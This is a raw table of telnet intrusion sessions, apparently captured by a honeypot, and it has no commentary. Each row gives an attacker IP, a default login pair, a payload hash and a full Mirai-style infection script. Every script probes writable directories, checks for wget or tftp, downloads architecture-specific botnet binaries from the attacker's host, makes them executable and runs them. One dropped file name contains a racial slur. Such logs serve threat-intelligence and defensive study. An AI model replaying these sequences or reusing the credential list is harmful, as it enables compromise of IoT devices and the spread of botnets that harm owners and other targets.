| IP address |
User name |
Password |
SHA256 of the payload file |
 192.236.154.112
| root | cat1029 | cd2befed3d313369eda248d92ef31bae45daa992bc4890ef8d6689fdf60c1908 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf wrgnuwrijo wertgniju35
/bin/busybox cp /bin/busybox wrgnuwrijo; >wrgnuwrijo; /bin/busybox chmod 777 wrgnuwrijo; /bin/busybox HITO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HITO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HITO
/bin/busybox wget http://192.236.154.112:80/wrgjwrgjwrg246356356356/harm -O - > wrgnuwrijo; /bin/busybox chmod 777 wrgnuwrijo; /bin/busybox HITO
./wrgnuwrijo wget.echo.telnet.arm; /bin/busybox HITO
/bin/busybox rm -rf wertgniju35 wrgnuwrijo
/bin/busybox cp /bin/busybox wrgnuwrijo; >wrgnuwrijo; /bin/busybox chmod 777 wrgnuwrijo; /bin/busybox HITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HITO
/bin/busybox wget http://192.236.154.112:80/wrgjwrgjwrg246356356356/harm7 -O - > wrgnuwrijo; /bin/busybox chmod 777 wrgnuwrijo; /bin/busybox HITO
./wrgnuwrijo wget.echo.telnet.arm7; /bin/busybox HITO
/bin/busybox rm -rf wertgniju35; >wrgnuwrijo; /bin/busybox HITO |
157.245.213.249 | admin | password | e67298c4137160091202920a6307a2ee0f961187599266b96c8cac5b66909957 |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://157.245.213.249:80/bins/hoho.arm -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6 HOHO-U79OL
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://157.245.213.249:80/bins/hoho.arm7 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |
157.245.213.249 | admin | comcomcom | 6d9d84660aa0a0e0f52bd49dbf7c091dd99a6d6552bd3cd0d3d2b10fc4c80e7c |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://157.245.213.249:80/bins/hoho.mips -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |
 185.164.72.244
| 2323 | | 35195fb56164ca939cd2d6cf790158af1d849314da367da8ab7d8b6566c1f70c |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .mrx0 w0w
/bin/busybox cp /bin/busybox .mrx0; >.mrx0; /bin/busybox chmod 777 .mrx0; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://185.164.72.244:80/Qutcasts/updating.arm -O - > .mrx0; /bin/busybox chmod 777 .mrx0; /bin/busybox UNSTABLE
./.mrx0 selfrep.arm; /bin/busybox ELBATSNU
/bin/busybox rm -rf w0w .mrx0
/bin/busybox cp /bin/busybox .mrx0; >.mrx0; /bin/busybox chmod 777 .mrx0; /bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://185.164.72.244:80/Qutcasts/updating.arm7 -O - > .mrx0; /bin/busybox chmod 777 .mrx0; /bin/busybox UNSTABLE
./.mrx0 selfrep.arm7; /bin/busybox ELBATSNU
/bin/busybox rm -rf w0w; >.mrx0; /bin/busybox UNSTABLE |
185.164.72.135 | maintainer | bcpb+serial# | 45b3a72b4f63918a9c738deb2123fb9fb9abb2c19d49c3674117725942bd9bb8 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://185.164.72.135:80/bins/sora.arm -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.arm; /bin/busybox BIGREP
/bin/busybox rm -rf dropper NiGGeR69xd
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://185.164.72.135:80/bins/sora.arm7 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.arm7; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
157.245.213.249 | Administrator | buh | 6d9d84660aa0a0e0f52bd49dbf7c091dd99a6d6552bd3cd0d3d2b10fc4c80e7c |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://157.245.213.249:80/bins/hoho.mips -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |
185.164.72.244 | 2323 | | 817cb31878d4c7e0c7be7bbceec7e99425b60cd2da89f3214bfe03d167487ddc |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .mrx0 w0w
/bin/busybox cp /bin/busybox .mrx0; >.mrx0; /bin/busybox chmod 777 .mrx0; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://185.164.72.244:80/Qutcasts/updating.arm -O - > .mrx0; /bin/busybox chmod 777 .mrx0; /bin/busybox UNSTABLE
./.mrx0 selfrep.arm; /bin/busybox ELBATSNU
/bin/busybox rm -rf w0w .mrx0
/bin/busybox cp /bin/busybox .mrx0; >.mrx0; /bin/busybox chmod 777 .mrx0; /bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://185.164.72.244:80/Qutcasts/updating.arm7 -O - > .mrx0; /bin/busybox chmod 777 .mrx0; /bin/busybox UNSTABLE
./.mrx0 selfrep.arm7; /bin/busybox ELBATSNU
/bin/busybox rm -rf w0w; >.mrx0; /bin/busybox UNSTABLE |
 178.62.251.149
| 7v | GC))GCDDv | 02a9e4c8b06496760b92151678e46863c681413af2fbcae4fa2d374ec881dd23 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf 69blue blue69
/bin/busybox cp /bin/busybox 69blue; >69blue; /bin/busybox chmod 777 69blue; /bin/busybox CHAOTIC
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox CHAOTIC
/bin/busybox wget; /bin/busybox tftp; /bin/busybox CHAOTIC
/bin/busybox wget http://178.62.251.149:80/bins/hyena.mpsl -O - > 69blue; /bin/busybox chmod 777 69blue; /bin/busybox CHAOTIC
./69blue telnet.mpsl; /bin/busybox hostility |